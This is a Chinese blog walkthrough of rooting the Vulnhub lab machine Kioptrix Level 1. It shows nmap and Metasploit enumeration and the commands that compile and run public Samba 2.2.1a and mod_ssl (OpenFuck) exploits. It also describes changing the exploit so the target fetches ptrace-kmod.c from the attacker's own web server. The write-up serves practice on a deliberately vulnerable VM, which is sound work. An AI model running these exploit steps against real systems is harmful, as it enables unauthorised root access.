Vulnhub靶机:Kioptrix_Level1

已于 2024-03-19 10:49:29 修改
阅读量850 收藏 17
点赞数 16
分类专栏: 靶场 文章标签: web安全
于 2024-03-12 21:04:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48904485/article/details/136663183
版权

一、介绍

运行环境:Virtualbox和vmware

攻击机:kali(192.168.56.101)

靶机:Kioptrix_Level1(192.168.56.105)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

二、信息收集

使用nmap主机发现靶机ip:192.168.56.105

在这里插入图片描述

使用nmap端口扫描发现靶机开放端口:22、80、111、139、443、1024

nmap -A 192.168.56.105 -p 1-65535

在这里插入图片描述

打开网站未发现可利用的功能点和隐藏信息

在这里插入图片描述

根据nmap的扫描结果发现开放了139端口,smb服务,利用nmap脚本扫描139端口,发现靶机存在cve-2009-3103漏洞

nmap 192.168.56.105 -p 139 --script smb*

在这里插入图片描述

在网上找了很多exp,发现都利用不了

使用msf探测一下smb服务的版本信息,为samba 2.2.1a

msfconsole
search smb_version
use auxiliary/scanner/smb/smb_version
show options
set rhosts 192.168.56.105
run

在这里插入图片描述

三、漏洞利用

使用searchsploit搜索该版本的samba的历史漏洞,发现命令执行漏洞,将exp导出

searchsploit samba 2.2.1a

在这里插入图片描述

编译,根据脚本的注释执行脚本

gcc 10.c -o 10
./10 -b 0 -v 192.168.56.105

在这里插入图片描述

获得root权限

在这里插入图片描述

还有一个方法是利用Apache mod_ssl漏洞

根据nmap的扫描结果80端口安装Apache/1.3.20 mod_ssl/2.8.4

使用searchsploit搜索mod_ssl的历史漏洞

searchsploit mod_ssl

在这里插入图片描述

发现三个对应版本的exp,我们挨个尝试,发现都报错

gcc -o 764 764.c -lcrypto

在这里插入图片描述

最后发现是exp的问题,我们下载最新的exp:https://www.exploit-db.com/exploits/47080

编译执行

在这里插入图片描述

根据靶机系统和apache的版本选择偏移量,构造命令

./exp 0x6b 192.168.56.105 -c 40

在这里插入图片描述

得到apache的权限的shell

理论上应该是root权限,发现在exp执行时,出现报错:找不到ptrace-kmod.c文件

在这里插入图片描述

在exp源码查找出现问题的地方,在309行,会在靶机执行命令下载ptrace-kmod.c文件,而我的靶机网络设置的是仅主机模式,下载不了

nl exp.c| grep ptrace

在这里插入图片描述

我们可以将ptrace-kmod.c文件下载到本地,然后在本地开一个web服务器,让靶机请求攻击机获取ptrace-kmod.c文件

cd /var/www/html 
wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c 
service apache2 start

在这里插入图片描述

修改exp源码,将请求改为攻击机的ip

在这里插入图片描述

保存编译执行,得到root权限

在这里插入图片描述

参考链接:Vulnhub系列:Kioptix Level 1_vulnhub kioptix level 1-CSDN博客

KIOPTRIX: LEVEL 1 通关详解_kioptrix level 1 - 搜狗搜索-CSDN博客

huang0c
关注
  • 16
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
kioptrix_level_1 新手入门级通关攻略
qq_58683895的博客
09-16 598
适用于零基础新人的通关攻略,其中包含涉及到知识点
Vulnhub系列:Kioptix Level 1
Fuzz
07-30 1196
简介 Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台。 个人学习目的:1,方便学习更多类型漏洞。2,为0SCP做打基础。 下载链接 https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 运行环境 kali:192.168.44.128 靶机:NAT模式 特别说明:有的小伙伴在打开虚拟机后,无法获取到靶机IP地址 这里特别说明:修改“Kioptix Level 1.vmx”配置文件中ethernet0.networkN
类OSCP靶机-Kioptix Level 1
ETO发展中心
07-29 929
同步发布:https://www.youi.xin/?p=435 类OSCP靶机-Kioptix Level 1 官方下载地址:Kioptrix: Level 1 (#1): https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 百度云下载地址:链接:https://pan.baidu.com/s/1aYc6P2aqPCL4jY1H-G6Z1w 提取码:youi vulnhub简介 https://www.vulnhub.com/about/
Vulnhub系列-Kioptix-Level-1-1
Yasso的博客
12-18 540
靶机: 192.168.249.129 kali: 192.168.249.132 一、信息收集 arp-scan -l —使用网络接口IP地址和网络掩码,生成目标主机地址列表nmap -sV 192.168.249.129 —查看开放端口 信息:Apache/1.3.20、mod_ssl/2.8.4、OpenSSL/0.9.6b nikto -host http://192.168.249.129/ —开放80、443端口,深入探测 nikto扫到CVE-2002-0082(Apache Mod_SSL
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Kioptrix Level 1 靶机wp
m0_52496313的博客
08-10 992
Kioptrix Level 1 靶机wp
KIOPTRIX: LEVEL 1-VulnHub靶机学习第二篇
qq_27466929的博客
08-23 518
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1
Kioptrix Level 1靶机检测不到IP地址 (determine ip info for eth0 failed)
Viv233的博客
01-29 2158
这里写自定义目录标题背景介绍失败的尝试我是怎么开窍了呢 背景介绍 我是一枚纯小白,艰难的自学OSCP中。。。今天跟着INE的视频启动 Kioptrix Level 1靶机后 发现用netdiscover 和nmap都扫不出靶机IP。 失败的尝试 开始搜怎么回事这是,找到了这样两篇类似帖子: https://blog.csdn.net/qq_41918771/article/details/1036...
CTF之Kioptrix Level 1.1 靶机渗透(万能密码 命令注入)
afei001
04-16 977
练习环境     攻击机:kali     靶机Kioptrix: Level 1.1 下载地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar 1.发现靶机,端口扫描 root@kali:~# netdiscover -r 192.168.43.0/16 ________________________...
kioptrix.level1 -VulnHub靶机学习记录
weixin_45509443的博客
06-16 563
1.
vulnhub 靶机 Kioptrix Level 1渗透笔记
weixin_52268949的博客
03-03 5472
靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ kali ip 信息收集 先使用nmap收集目标的ip地址 nmap -sP 192.168.101.0/24 扫描开放端口 nmap -A -p- 192.168.101.20 这时我们发现samba的绑定服务器的139端口我们使用msf探测一下他的版本 msfconsole msf6 > use auxiliary/scanner/smb/smb_version
Kioptrix Level 1靶机闯关001
qq_46527080的博客
11-07 282
Kioptrix Level 1靶机 1.信息收集:nmap -sn 本网段的ip所在所有的主机信息 nmap -sn 192.168.9.0/24 发现靶机的ip是192.168.9.30 攻击机是192.168.9.31 扫描端口开放信息: nmap 192.168.9.30 2.扫描是否有可利用的目录,和御剑差不多 dirb http://192.168.1.104/ 3.测试靶机中的漏洞: Nikto -h 192.168.9.30 4.扫描出来漏洞中,再从网站https://www
2024中国网络安全产品用户调查报告(发布版)
2301_76786857的博客
06-12 701
本报告正是安在新媒体发起,基于“诸子云社群,以“取之于民,用之于民"的方式,反馈“甲方"眼中的中国网络安全市场情况,为网络安全行业提供来自网络安全企业用户视角的参考。自2020年始,人类进入了21世纪的第二个十年,全球进入了百年未有之大变局,新十年的开始即被新冠疫情逆转了全球化发展的历程,而至2022年3月俄乌战争又突然爆发,紧接着2023年7月“巴以冲突"皱起,世界快速进入动荡中,不确定性激增,网络对抗愈演愈烈,导致中国网络安全市场和环境受到重大影响。
网络安全实战:剖析ThinkPHP 5.1.X反序列化漏洞
最新发布
weixin_43822401的博客
06-16 348
ThinkPHP作为广泛使用的PHP开发框架,在5.1.X版本中存在一个严重的反序列化漏洞。该漏洞允许攻击者通过构造特定的序列化字符串,实现在服务器上执行任意代码,从而可能导致数据泄露、服务中断等安全事件。
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huang0c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值